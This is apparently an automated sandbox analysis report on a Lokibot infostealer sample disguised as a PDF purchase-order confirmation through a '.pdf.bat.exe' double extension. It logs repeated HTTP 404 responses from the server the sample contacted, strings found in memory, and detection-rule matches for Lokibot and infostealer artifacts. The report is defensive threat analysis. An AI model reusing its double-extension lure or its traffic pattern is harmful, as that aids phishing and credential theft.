            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BqeNbZ0cKpNhhbk7XJswe1DYCQVe4gFa4B%2F%2FTnEJde2WkesLqXSYw4Af6Fp31SLwiIODxO2KabyXzRQF9dd8SMX5CoeMSZBQ1ZqQpCRc3644bALw6XMrwpHOjaw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201eb6ce93ada06-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=117&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:04:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZgsbCTmCFj%2FXfsqEaoT9ukEPu3aqfEHygIRBWhBOyrNWR3yI4mbi287%2FwSTyKTDwt%2BlhRpjDud1cazONAqd7OX6xJZt47RFOenaB9h5kQc9gMaAbaExg6YIs4OU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201eb793c237039-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=2038&rtt_var=1019&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=130&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WOo8D8s2lHicr5hejeRmRxrnpw7QWXIQS291dd5TlWNiM%2Bf3rj4SN1kND49MvlCdb48F2KqpdO1ayF5anIFn1CsoXKuEB2PgydbIyxzu75TaixY%2F4yncYdp4P34%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201eb9188b20f89-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1654&rtt_var=827&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmiBVj6wibDfHHS0BvJkZ8f0WEC4h8x6R3S77aLrEOh4CKRbso1sV8HNGyqBWvAeZ4L%2BVfO0vpVf49DSwJZAOOjRUOVoQwhGKN5YsjljhtDLP%2FidIsBHIrpGCdM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201eb9dce2caa2a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Jm%2BbMLseVWG9bzZl6BRsuUosO3bEyeZZXXDupD0Gh32NNuMIAXOOeVUYd9yfB3wt149B5HTTR%2FlZ6AUr%2BqyWlSE%2F8rIAU5%2FZ3WtQ8lGd4TDWBp9Z4F9gVv0zoQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ebb4bebe5541-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xErh1X35omj43LLSoGZeKrhqDOuUVcoHeJGzMocSJBtA%2B2kRFZDjmTFWzdpX1mGEvcGNwfuSXiMrBBAJMytlV35cOn2TBQh6QDDDsJwUNAVyLhOqYv0KgMFvguc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ebd7faf3de9b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1623&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OfLmnKafcPmuPb7wVt5lESHNKS%2BWU7AelGPtH4MiutUwle12SOTvp8yMs1cEGa36l%2FTbn8Ir3weJ2jeEW9ETqzSoLn%2FaY6dNR6Ahz5YTAFijClZNS2WjcD9Kmms%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ebe42e99dd37-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2383&min_rtt=2383&rtt_var=1191&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=133&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1e6vweGCQ0KpSLAvP7kee0VNR4df5bQ3rU2AikBfY3S0IB3ujxJsJJ%2BBffRNKgjYLXi2J32Ac6Pb48I0QNwTN6e0DxuiK2hXhF33Wa34jjiz3By%2BbBas4LAptVE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ebfcbb328465-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1650&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=91&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QQxvUpeQJ96UaRpj%2Br98ZykeWzf2ca7UlcPvpR9W4LUSHYLFGYrL3DLeZaUAhOttCv7PvaQiYLBDbEvogPLaP%2BKxaCCHPOv%2FgXaspz6oDmHH1XcssD9iwNQHDqI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ec08c993f569-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=91&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cBjLFgoqfjrL%2B5nn7nOtDEi%2BuiLgXCGzViNepEGsPqJgaEIWOcSOoW%2Bi5vlzGkiFzrGytL1u%2FsnDpLN9qotYJnaDVbK5oMZctTuv20VyLBH9WfRo3kXbx1I2dAM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ec1fbf484e4d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2100&min_rtt=2100&rtt_var=1050&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=77&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=At44nRF5MXmYDteANtYA2kd1WUbX6E%2BgzD7%2ByjDzKfRpAeOrmIM4Zn73gNGXMWtDv%2FIRY1YLw1vtPv67Wkqx1b79ACuVO0RrmxtKkXhh2sHmf9d2PByeAqnGAWI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ec2afb4af02b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2448&min_rtt=2448&rtt_var=1224&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=122&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5f2nhx8QuEuUdqsgHvY0tP9q2hWNMiK7obZSoa%2BY18Y6hq5sifScKbnqP3TNLdE%2Brse19ow4t78Is42aII31Ebetrqh0cExFyQFmev7yWftpDapylG97A9d4So%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ec361b101819-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1695&rtt_var=847&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L3EENNSp9lwei6ze%2Fvm1lfd911HNv2Nbdexf1EHtNYSeA7LYUzHVM%2BMlHVBxequ8oBnTQExElF80VFRKBcuXhmAkqzgbYfTyPLpHEyz7W2kZVrXjlMtqBLzNtxM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ec41eb510fa4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1614&rtt_var=807&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EOLblsJXTp1OR6TqLLmGBGf%2BGM7HwN%2B1gIqCJVDPF3EZTqyQwi8%2FrlSuyPiQ7VFcx7bgAnzV83Ghu%2BnkPDYScmoKYrvSKodUMpyJtihoBgL2wFX5FQea7AF0EQU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ec59ba4288c3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2082&min_rtt=2082&rtt_var=1041&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=107&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xgkgLiqO5YYKhUNGgsZSzcjKnpxROvqAM2HItYU8GU5Clw6YVfBay8slaydUsynmftYSEA0aOSrRwDIBZjyYK2tc4iySu3YPbUsd%2FwTKNSVjFpYXigsG%2FUqYr6M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ec655eb632fa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1882&min_rtt=1882&rtt_var=941&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3jwSDZUH5IScHs4ioQ96mq59CFjGRAtlnUpQktFShvEz7iY0qCaF9%2FA3X7GmjGmU8hbxRozuNphQm79SWekl8x2PjKc47kl7jB5B5LCsNDRi6UMLtmr2Pb%2BLB0M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ec716b997d1e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1955&min_rtt=1955&rtt_var=977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9b0Pou601hiyzhBMygqHQ8BxCWCntDBlRE5R1dezfrH6TyklTkp%2BD8jKLAVIofXtxFCuwSKUV1xu%2BthppmJCx7A1DePSmrOu%2FDthxsxX6ss1PrZctJfujk4CBY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ec7dcc56c33d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1651&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=149&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yonpWc8r3r5sQutXz6cBnFcPFXv6kaw0aVobyvFzMt3CcR%2FUJHYCoidMn55qVePLKMTNMmUInhNlomL6iIcNhloRmzGv1DZZmq2ha5nnbqY27k5VJZGosmcj7lw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ecb9bb1a32b1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1643&rtt_var=821&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2BwWQwjUKB19N8vIPi%2F%2FjintcmKslIbpW2VEt0N1gbhgeNI0B5JqNXbmeP1LTZL5VEYpVZ7EKx5S7l86RRuazVWoH0TYAmpgm7vl6E9Wll31cFQxiHArjQOCjsw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ecd17d61c54d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1690&rtt_var=845&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=102&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1nevIQabZDR%2Frhq2DV5Rc5kVBOf27ixl2w5T13Z6jqFcMqJQ5%2B%2BcdNv6xIooVt%2Fb%2BACuPbFbYO4Fy56ADQh%2FzAvehKOQAPFXcXxDLRMt9JxN9xIiKIdReyBtM2Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ece92fffe5e2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=101&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:05:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TGUUXAHE71Qf253JvRgeRPKQ6yRG3ssAknm7MHucFhA%2F8nYzz%2FKJ8sKschF%2BYaxZjr38m9zrU2eXcETUIG0NwzQCmsvVE6E%2BDJ07iGvjD8L5%2FdL0sz0AiVuxjyg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ed00891443a3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1707&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 07:06:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Os3roUYaLSssEVqmPPHrqr0IxurOr7uwBhiDT5qohO4FxOfsi%2BhNjXZvOCEq%2BaU%2Ftz%2BvVMaX3zXoDRCfzgQXlG3%2BQBNHAogzqwj%2F2FK%2Fk%2FLG26lc9WGgAyS6RbU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9201ed0c9fdf41f5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1658&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000000.00000002.1258932642.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/

            System Summary

            barindex
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
